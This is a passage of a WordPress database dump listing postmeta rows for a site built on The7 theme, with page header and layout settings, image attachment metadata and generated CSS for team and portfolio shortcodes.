(13076,2346,'_wp_old_date','2022-10-09'),
(13077,2348,'_wp_old_date','2022-10-09'),
(13078,2349,'_wp_old_date','2022-10-09'),
(13079,2350,'_wp_old_date','2022-10-09'),
(13080,2351,'_wp_old_date','2022-10-09'),
(13081,2084,'_wp_old_date','2022-10-09'),
(13082,2352,'_wp_old_date','2022-10-09'),
(13083,2281,'_wp_old_date','2022-10-09'),
(13084,2353,'_wp_old_date','2022-10-09'),
(13085,2354,'_wp_old_date','2022-10-09'),
(13086,2355,'_wp_old_date','2022-10-09'),
(13087,2282,'_wp_old_date','2022-10-09'),
(13088,2283,'_wp_old_date','2022-10-09'),
(13089,2284,'_wp_old_date','2022-10-09'),
(13090,2285,'_wp_old_date','2022-10-09'),
(13091,2356,'_wp_old_date','2022-10-09'),
(13092,2357,'_wp_old_date','2022-10-09'),
(13093,2359,'_wp_old_date','2022-10-09'),
(13094,2358,'_wp_old_date','2022-10-09'),
(13095,2286,'_wp_old_date','2022-10-09'),
(13096,2768,'_edit_lock','1675606061:1'),
(13097,2768,'_edit_last','1'),
(13098,2768,'_wpb_vc_js_status','true'),
(13099,2768,'_dt_sidebar_position','disabled'),
(13100,2768,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13101,2768,'_dt_sidebar_hide_on_mobile','0'),
(13102,2768,'_dt_footer_show','1'),
(13103,2768,'_dt_footer_widgetarea_id','sidebar_2'),
(13104,2768,'_dt_footer_hide_on_mobile','0'),
(13105,2768,'_dt_header_title','fancy'),
(13106,2768,'_dt_header_background','normal'),
(13107,2768,'_dt_header_background_below_slideshow','disabled'),
(13108,2768,'_dt_header_transparent_bg_color_scheme','light'),
(13109,2768,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13110,2768,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13111,2768,'_dt_header_transparent_bg_color','#000000'),
(13112,2768,'_dt_header_transparent_bg_opacity','50'),
(13113,2768,'_dt_header_disabled_background','normal'),
(13114,2768,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13115,2768,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13116,2768,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13117,2768,'_dt_header_disabled_transparent_bg_color','#000000'),
(13118,2768,'_dt_header_disabled_transparent_bg_opacity','50'),
(13119,2768,'_dt_page_overrides_top_margin',''),
(13120,2768,'_dt_page_overrides_right_margin',''),
(13121,2768,'_dt_page_overrides_bottom_margin',''),
(13122,2768,'_dt_page_overrides_left_margin',''),
(13123,2768,'_dt_mobile_page_padding_top',''),
(13124,2768,'_dt_mobile_page_padding_right',''),
(13125,2768,'_dt_mobile_page_padding_bottom',''),
(13126,2768,'_dt_mobile_page_padding_left',''),
(13127,2768,'_dt_fancy_header_layout_heading',''),
(13128,2768,'_dt_fancy_header_title_aligment','center'),
(13129,2768,'_dt_fancy_header_height','300'),
(13130,2768,'_dt_fancy_header_padding-top','0px'),
(13131,2768,'_dt_fancy_header_padding-bottom','0px'),
(13132,2768,'_dt_fancy_header_breadcrumbs_heading',''),
(13133,2768,'_dt_fancy_header_breadcrumbs','disabled'),
(13134,2768,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13135,2768,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13136,2768,'_dt_fancy_header_title_heading',''),
(13137,2768,'_dt_fancy_header_title_mode','custom'),
(13138,2768,'_dt_fancy_header_title',''),
(13139,2768,'_dt_fancy_header_title_font_size','30'),
(13140,2768,'_dt_fancy_header_title_line_height','36'),
(13141,2768,'_dt_fancy_header_text_transform','none'),
(13142,2768,'_dt_fancy_header_title_color_mode','color'),
(13143,2768,'_dt_fancy_header_title_color','#ffffff'),
(13144,2768,'_dt_fancy_header_subtitle_heading',''),
(13145,2768,'_dt_fancy_header_subtitle',''),
(13146,2768,'_dt_fancy_header_subtitle_font_size','18'),
(13147,2768,'_dt_fancy_header_subtitle_line_height','26'),
(13148,2768,'_dt_fancy_header_subtitle_text_transform','none'),
(13149,2768,'_dt_fancy_header_subtitle_color_mode','color'),
(13150,2768,'_dt_fancy_header_subtitle_color','#ffffff'),
(13151,2768,'_dt_fancy_header_bg_heading',''),
(13152,2768,'_dt_fancy_header_bg_color','#222222'),
(13153,2768,'_dt_fancy_header_bg_image_origin','featured_image'),
(13154,2768,'_dt_fancy_header_bg_image','a:0:{}'),
(13155,2768,'_dt_fancy_header_bg_repeat','no-repeat'),
(13156,2768,'_dt_fancy_header_bg_position_x','center'),
(13157,2768,'_dt_fancy_header_bg_position_y','center'),
(13158,2768,'_dt_fancy_header_bg_fullscreen','1'),
(13159,2768,'_dt_fancy_header_bg_overlay','0'),
(13160,2768,'_dt_fancy_header_overlay_color','#000'),
(13161,2768,'_dt_fancy_header_bg_overlay_opacity','50'),
(13162,2768,'_dt_fancy_header_scroll_effect','default'),
(13163,2768,'_dt_fancy_header_bg_parallax','0.5'),
(13164,2768,'_dt_fancy_header_responsiveness_heading',''),
(13165,2768,'_dt_fancy_header_responsiveness','enabled'),
(13166,2768,'_dt_fancy_header_responsiveness_switch','778px'),
(13167,2768,'_dt_fancy_header_responsive_height','70'),
(13168,2768,'_dt_fancy_header_responsive_font_size','30'),
(13169,2768,'_dt_fancy_header_responsive_title_line_height','38'),
(13170,2768,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13171,2768,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13172,2768,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13173,2768,'_dt_project_options_back_button',''),
(13174,2768,'_dt_project_options_show_link',''),
(13175,2768,'_dt_project_options_link',''),
(13176,2768,'_dt_project_options_link_target',''),
(13177,2768,'_dt_project_options_link_name',''),
(13178,2768,'_dt_project_options_hide_thumbnail','1'),
(13179,2768,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(13180,2768,'_dt_project_options_related_mode','same'),
(13181,2768,'_dt_project_options_preview','normal'),
(13182,2768,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/ws12m.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13183,2770,'_wp_attached_file','2022/10/ws12m.jpg'),
(13184,2770,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1300;s:6:\"height\";i:908;s:4:\"file\";s:17:\"2022/10/ws12m.jpg\";s:8:\"filesize\";i:1187332;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"ws12m-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17778;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"ws12m-1024x715.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:715;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139885;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"ws12m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7417;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"ws12m-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86751;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13185,2768,'_thumbnail_id','2770'),
(13186,2768,'_wp_page_template','default'),
(13188,2768,'_dt_microsite_primary_menu',''),
(13189,2768,'_dt_microsite_split_left_menu',''),
(13190,2768,'_dt_microsite_split_right_menu',''),
(13191,2768,'_dt_microsite_mobile_menu',''),
(13192,2785,'_edit_lock','1675321625:1'),
(13193,2768,'the7_shortcodes_dynamic_css','a:2:{s:32:\"c41d05627c5c3ebe936418250d89e93f\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c41d05627c5c3ebe936418250d89e93f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  